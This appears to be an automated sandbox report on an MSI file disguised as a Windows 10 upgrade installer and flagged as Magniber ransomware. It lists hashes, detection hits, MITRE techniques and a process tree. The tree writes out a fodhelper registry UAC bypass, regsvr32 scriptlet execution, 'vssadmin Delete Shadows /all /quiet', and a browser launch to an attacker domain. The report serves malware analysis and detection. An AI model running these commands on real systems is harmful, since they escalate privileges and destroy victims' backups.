magniber | 378aaaf87dd28992eb2dff01fde5698ac9d10ab28cb8cf6fb28956639261f77b

Analysis

max time kernel
148s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230831-en
resource tags

arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
submitted
06-09-2023 02:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Win10.0_System_Upgrade_Software (1).msi
Size

96KB
MD5

6c120194a2f94ef993950e55bd00108b
SHA1

670b20bf3be343efec6a162c3fc5443c9ec0f367
SHA256

48b9a931b49c1b20ec23f182246b937265e735937c2d798f9f2fee557018b629
SHA512

b4976bd4ba4bc3092ac924cbd7423e27a73aa926282f3fa36ba14892defec5e8fec2f6460fbcbb03ee4b7831610d45dd7290dd12ab61a8ce24911f51879494ae
SSDEEP

1536:9w6uKzgNtoaIbxxmNDMOVASySUXFmff0D80Dq7fx5:9kKzkYs3SSyS+UbLx5

Score

10^/10

magniber ransomware

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral2/memory/840-23-0x000001BEA7AB0000-0x000001BEA7ABC000-memory.dmp	family_magniber
behavioral2/memory/2496-24-0x000002BAD5CC0000-0x000002BAD5CC3000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (83) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	4712	msiexec.exe
11	4712	msiexec.exe

Loads dropped DLL 1 IoCs

pid	Process
840	MsiExec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 840 set thread context of 2496	840	MsiExec.exe	12
PID 840 set thread context of 2512	840	MsiExec.exe	52
PID 840 set thread context of 2640	840	MsiExec.exe	13

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Installer\SourceHash{48A1813D-A017-4D8E-B8E1-8A80EB98A66E}	msiexec.exe
File created	C:\Windows\Installer\e57dc27.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57dc27.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDD50.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE2EF.tmp	msiexec.exe
File created	C:\Windows\Installer\e57dc29.msi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000028a954878eb57250000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000028a95480000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900028a9548000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d028a9548000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000028a954800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4900	vssadmin.exe
872	vssadmin.exe
3260	vssadmin.exe
1576	vssadmin.exe
3268	vssadmin.exe
1356	vssadmin.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4148	msiexec.exe
4148	msiexec.exe
840	MsiExec.exe
840	MsiExec.exe
2772	msedge.exe
2772	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
4800	identity_helper.exe
4800	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
840	MsiExec.exe
840	MsiExec.exe
840	MsiExec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4712	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4712	msiexec.exe
Token: SeSecurityPrivilege	4148	msiexec.exe
Token: SeCreateTokenPrivilege	4712	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4712	msiexec.exe
Token: SeLockMemoryPrivilege	4712	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4712	msiexec.exe
Token: SeMachineAccountPrivilege	4712	msiexec.exe
Token: SeTcbPrivilege	4712	msiexec.exe
Token: SeSecurityPrivilege	4712	msiexec.exe
Token: SeTakeOwnershipPrivilege	4712	msiexec.exe
Token: SeLoadDriverPrivilege	4712	msiexec.exe
Token: SeSystemProfilePrivilege	4712	msiexec.exe
Token: SeSystemtimePrivilege	4712	msiexec.exe
Token: SeProfSingleProcessPrivilege	4712	msiexec.exe
Token: SeIncBasePriorityPrivilege	4712	msiexec.exe
Token: SeCreatePagefilePrivilege	4712	msiexec.exe
Token: SeCreatePermanentPrivilege	4712	msiexec.exe
Token: SeBackupPrivilege	4712	msiexec.exe
Token: SeRestorePrivilege	4712	msiexec.exe
Token: SeShutdownPrivilege	4712	msiexec.exe
Token: SeDebugPrivilege	4712	msiexec.exe
Token: SeAuditPrivilege	4712	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4712	msiexec.exe
Token: SeChangeNotifyPrivilege	4712	msiexec.exe
Token: SeRemoteShutdownPrivilege	4712	msiexec.exe
Token: SeUndockPrivilege	4712	msiexec.exe
Token: SeSyncAgentPrivilege	4712	msiexec.exe
Token: SeEnableDelegationPrivilege	4712	msiexec.exe
Token: SeManageVolumePrivilege	4712	msiexec.exe
Token: SeImpersonatePrivilege	4712	msiexec.exe
Token: SeCreateGlobalPrivilege	4712	msiexec.exe
Token: SeBackupPrivilege	4780	vssvc.exe
Token: SeRestorePrivilege	4780	vssvc.exe
Token: SeAuditPrivilege	4780	vssvc.exe
Token: SeBackupPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe
Token: SeTakeOwnershipPrivilege	4148	msiexec.exe
Token: SeRestorePrivilege	4148	msiexec.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
4712	msiexec.exe
4712	msiexec.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe
2972	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4148 wrote to memory of 1724	4148	msiexec.exe	92
PID 4148 wrote to memory of 1724	4148	msiexec.exe	92
PID 4148 wrote to memory of 840	4148	msiexec.exe	95
PID 4148 wrote to memory of 840	4148	msiexec.exe	95
PID 2496 wrote to memory of 4188	2496	sihost.exe	96
PID 2496 wrote to memory of 4188	2496	sihost.exe	96
PID 2512 wrote to memory of 1188	2512	svchost.exe	97
PID 2512 wrote to memory of 1188	2512	svchost.exe	97
PID 2640 wrote to memory of 2836	2640	taskhostw.exe	98
PID 2640 wrote to memory of 2836	2640	taskhostw.exe	98
PID 840 wrote to memory of 4056	840	MsiExec.exe	100
PID 840 wrote to memory of 4056	840	MsiExec.exe	100
PID 4056 wrote to memory of 2972	4056	cmd.exe	102
PID 4056 wrote to memory of 2972	4056	cmd.exe	102
PID 2972 wrote to memory of 4488	2972	msedge.exe	103
PID 2972 wrote to memory of 4488	2972	msedge.exe	103
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 1620	2972	msedge.exe	105
PID 2972 wrote to memory of 2772	2972	msedge.exe	106
PID 2972 wrote to memory of 2772	2972	msedge.exe	106
PID 2972 wrote to memory of 4420	2972	msedge.exe	107
PID 2972 wrote to memory of 4420	2972	msedge.exe	107
PID 2972 wrote to memory of 4420	2972	msedge.exe	107
PID 2972 wrote to memory of 4420	2972	msedge.exe	107
PID 2972 wrote to memory of 4420	2972	msedge.exe	107
PID 2972 wrote to memory of 4420	2972	msedge.exe	107

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/uop119e3wl
  2⤵
  - Modifies registry class
  PID:4188
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1948
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4292
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe
      4⤵
      PID:4972
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:1356
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1908
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1032
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe
      4⤵
      PID:4848
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3260

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/uop119e3wl
  2⤵
  - Modifies registry class
  PID:2836
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:3064
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4072
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe
      4⤵
      PID:2092
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:872
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:2276
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1776
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe
      4⤵
      PID:4276
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3268

C:\Windows\system32\msiexec.exe
msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\Win10.0_System_Upgrade_Software (1).msi"
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/uop119e3wl
  2⤵
  - Modifies registry class
  PID:1188
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4288
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1456
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe
      4⤵
      PID:2308
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4900
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:468
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:3064
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/ap8vy5rv60fe
      4⤵
      PID:2236
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:1576

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4148
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:1724
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 9F5A161B70947673245B275EC1D64B19
  2⤵
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:840
- - C:\Windows\System32\cmd.exe
    cmd /c "start microsoft-edge:http://7e2494f804383470866nmhyklv.rarefix.info/nmhyklv^&2^&45441802^&83^&433^&2219041
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://7e2494f804383470866nmhyklv.rarefix.info/nmhyklv&2&45441802&83&433&2219041
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2972
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb5c5546f8,0x7ffb5c554708,0x7ffb5c554718
        5⤵
        
        PID:4488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
        5⤵
        
        PID:1620
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2772
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
        5⤵
        
        PID:4420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        
        PID:4304
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        5⤵
        
        PID:4352
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,5799630749326926834,2341501005230415569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
        5⤵
        
        PID:3836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
